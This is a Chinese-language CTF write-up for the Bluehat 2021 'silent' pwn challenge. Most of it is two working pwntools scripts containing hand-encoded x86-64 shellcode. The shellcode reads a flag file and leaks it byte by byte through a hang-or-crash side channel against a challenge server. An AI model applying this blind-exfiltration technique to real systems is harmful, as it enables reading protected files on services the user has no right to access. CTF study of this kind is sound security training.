Bluehat2021-slient-WP

Posted on Apr 29, 2021

这题没什么技巧,就是逐字节爆破。由于 shellcode 无法输出任何东西,需要一个能区分“猜对/猜错”的旁路信号:在比较指令之后放一条 `jne +2`,跳过紧随其后的 `jmp $`(机器码 `eb fe`,原地死循环)。猜对时进程卡在死循环里,连接一直保持打开;猜错时跳过死循环,顺序执行后面的填充字节(0x61 在 64 位模式下不是合法指令),进程崩溃、连接断开,pwntools 会打印 Got EOF。这样通过每次连接是否出现 Got EOF 就能判断该次猜测是否正确。

可以用 pwntools 的 shellcraft 生成所需的 shellcode 片段,下面脚本中硬编码的机器码字节即由这些片段汇编而来:

# Generator for the comparison shellcode (pwntools shellcraft, amd64).
# Layout assumed by the immediates: shellcode loaded at 0x10000, the path
# string at 0x10000 + 0x30, read() buffer at 0x10500 -- TODO confirm against
# the challenge binary.
shellcode = asm(shellcraft.amd64.syscall('SYS_open',0x10000 + 0x30,0).rstrip())  # open(path, O_RDONLY)
shellcode += asm(shellcraft.amd64.syscall('SYS_read',3,0x10500,40).rstrip())  # read(3, buf, 40); rax = bytes read
shellcode += asm("cmp rax,12")  # 12 is a placeholder candidate length; the scripts below patch in the brute-forced value
shellcode += "\x75\x02" # jne +2: on mismatch skip the self-jump and fall into the padding below

# jmp $ (eb fe): on match spin forever so the connection stays open (no EOF);
# on mismatch the padding 'a' (0x61) is executed, which is not a valid 64-bit
# instruction, so the process dies and the client sees EOF.
shellcode += "\xeb\xfe" # jmp $
shellcode = shellcode.ljust(0x30,'a')  # pad to 0x30 so an appended path string lands at 0x10030

# NOTE(review): plain '=' here discards everything built above, and pushstr
# emits push instructions rather than raw bytes, so this reads as a separate
# experiment; the final exploit below appends the raw string "../pwn/flag".
shellcode = asm(shellcraft.amd64.pushstr("/home/pwn/flag"))
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
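context.log_level = 'debug'
context.arch = "amd64"
context.terminal = ["tmux","splitw","-h"]

# Challenge service; swap in process("./chall") (commented below) for local runs.
HOST, PORT = "8.140.177.7", 40334

# Addresses the hand-encoded immediates below resolve to (shellcode assumed
# to be loaded at 0x10000 -- confirm against the binary):
#   0x10030  start of the path string appended right after the code
#   0x10500  buffer that read() fills with the flag
#
# Oracle: the shellcode cannot write anything back, so the candidate length i
# is compared with read()'s return value:
#   rax == i -> jmp $ (self-loop): the process hangs, the connection stays open
#   rax != i -> jne skips the self-loop and execution falls into the padding
#               byte 0x61, which is not a valid 64-bit instruction -> crash,
#               and pwntools reports "Got EOF"
# Only length 18 is tried here; widen the range to search from scratch.
for i in range(18, 19):
    # `cmp rax, imm8` sign-extends the immediate, so only 0..127 are usable.
    if not 0 <= i < 0x80:
        raise ValueError("candidate length %d does not fit in an imm8" % i)

    shellcode  = "\x6a\x02\x58"                        # push 2; pop rax         rax = SYS_open
    shellcode += "\xbf\x01\x01\x02\x01"                # mov edi, 0x01020101
    shellcode += "\x81\xf7\x31\x01\x03\x01"            # xor edi, 0x01030131     edi = 0x10030 (path)
    shellcode += "\x31\xf6"                            # xor esi, esi            flags = O_RDONLY
    shellcode += "\x0f\x05"                            # syscall
    shellcode += "\x31\xc0"                            # xor eax, eax            rax = SYS_read
    shellcode += "\x6a\x03\x5f"                        # push 3; pop rdi         fd 3 (assumes 0-2 are the only open fds)
    shellcode += "\x6a\x28\x5a"                        # push 40; pop rdx        count = 40
    shellcode += "\xbe\x01\x01\x02\x01"                # mov esi, 0x01020101
    shellcode += "\x81\xf6\x01\x04\x03\x01"            # xor esi, 0x01030401     esi = 0x10500 (buffer)
    shellcode += "\x0f\x05"                            # syscall
    shellcode += "\x48\x83\xf8" + struct.pack("B", i)  # cmp rax, i
    shellcode += "\x75\x02"                            # jne +2   (skip the self-jump on mismatch)
    shellcode += "\xeb\xfe"                            # jmp $    (hang on match -> no EOF)
    shellcode += "\x61"                                # padding; executed on mismatch -> invalid -> crash
    #shellcode += "/home/pwn/flag\x00"
    shellcode += "../pwn/flag"                         # path at 0x10030; no NUL appended, relies on zeroed memory after it

    log.success(str(i))
    sh = None
    try:
        sh = remote(HOST, PORT)
        #sh = process("./chall")
        sh.sendafter("box.\n", shellcode)
        # Watch for "Got EOF" (wrong length) vs. a session that just hangs (right length).
        sh.interactive()
    except EOFError:
        # The service closed the connection before the prompt; count it as a miss.
        log.warning("length %d: connection closed early", i)
    finally:
        if sh is not None:
            sh.close()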

用同样的方法(比较 read 的返回值)可以爆破出 flag 文件的长度——脚本中留下的 i=18 与最终 17 个字符的 flag 加一个换行符相符——也能验证出一条更短的、可以打开 flag 的相对路径 “../pwn/flag”(注意该路径后没有显式写入 NUL 结尾,依赖 shellcode 之后的内存为零)。之后按字节爆破 flag 内容:每次从读入缓冲区取出下一个未知字节与候选字符比较,脚本如下:

#!/usr/bin/env python
# coding=utf-8
import string
import struct

from pwn import *
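context.terminal = ["tmux","splitw","-h"]
context.log_level = 'debug'

# Challenge service; swap in process("./chall") (commented below) for local runs.
HOST, PORT = "8.140.177.7", 40334

# Candidate alphabet for the next flag byte: digits, letters, punctuation.
# string.punctuation is exactly the set the original literal spelled out by
# hand (!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~).
liter = string.digits + string.ascii_letters + string.punctuation

# Bytes recovered so far; the next unknown byte sits at index len(flag).
# Extend this string after each confirmed byte and re-run.
flag = "flag{k33p_qu14t"
pos = len(flag)

# Buffer read() fills with the flag. This value is also baked into the
# xor-encoded immediates of the shellcode below, so changing it here alone
# does NOT move the buffer.
READ_BUF = 0x10500

# Oracle, same as for the length search: the shellcode cannot output anything,
# so flag[pos] is compared with the guess:
#   equal     -> jmp $ (self-loop): the process hangs, the connection stays open
#   not equal -> jne skips the self-loop and execution falls into the padding
#                byte 0x61 (invalid in 64-bit mode) -> crash -> "Got EOF"
for guess in liter:
    shellcode  = "\x6a\x02\x58"                            # push 2; pop rax         rax = SYS_open
    shellcode += "\xbf\x01\x01\x02\x01"                    # mov edi, 0x01020101
    shellcode += "\x81\xf7\x34\x01\x03\x01"                # xor edi, 0x01030134     edi = 0x10035 (path)
    shellcode += "\x31\xf6"                                # xor esi, esi            flags = O_RDONLY
    shellcode += "\x0f\x05"                                # syscall
    shellcode += "\x31\xc0"                                # xor eax, eax            rax = SYS_read
    shellcode += "\x6a\x03\x5f"                            # push 3; pop rdi         fd 3 (assumes 0-2 are the only open fds)
    shellcode += "\x6a\x28\x5a"                            # push 40; pop rdx        count = 40
    shellcode += "\xbe\x01\x01\x02\x01"                    # mov esi, 0x01020101
    shellcode += "\x81\xf6\x01\x04\x03\x01"                # xor esi, 0x01030401     esi = 0x10500 (buffer)
    shellcode += "\x0f\x05"                                # syscall
    shellcode += "\x8a\x04\x25" + p32(READ_BUF + pos)      # mov al, [disp32]        al = flag[pos]
    shellcode += "\x3c" + struct.pack("B", ord(guess))     # cmp al, guess
    shellcode += "\x75\x02"                                # jne +2   (skip the self-jump on mismatch)
    shellcode += "\xeb\xfe"                                # jmp $    (hang on match -> no EOF)
    shellcode += "\x61"                                    # padding; executed on mismatch -> invalid -> crash
    shellcode += "../pwn/flag"                             # path at 0x10035; no NUL appended, relies on zeroed memory after it

    log.success(guess)
    sh = None
    try:
        sh = remote(HOST, PORT)
        #sh = process("./chall")
        sh.recvuntil("Welcome")
        #gdb.attach(proc.pidof(sh)[0])
        sh.sendafter("box.\n", shellcode)
        # Watch for "Got EOF" (wrong byte) vs. a session that just hangs (right byte).
        sh.interactive()
    except Exception as exc:
        # Best-effort brute force: log the failure and move on to the next
        # candidate instead of aborting the whole run.
        log.warning("guess %r failed: %s", guess, exc)
    finally:
        if sh is not None:
            sh.close()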

最后得出 flag:flag{k33p_qu14t!}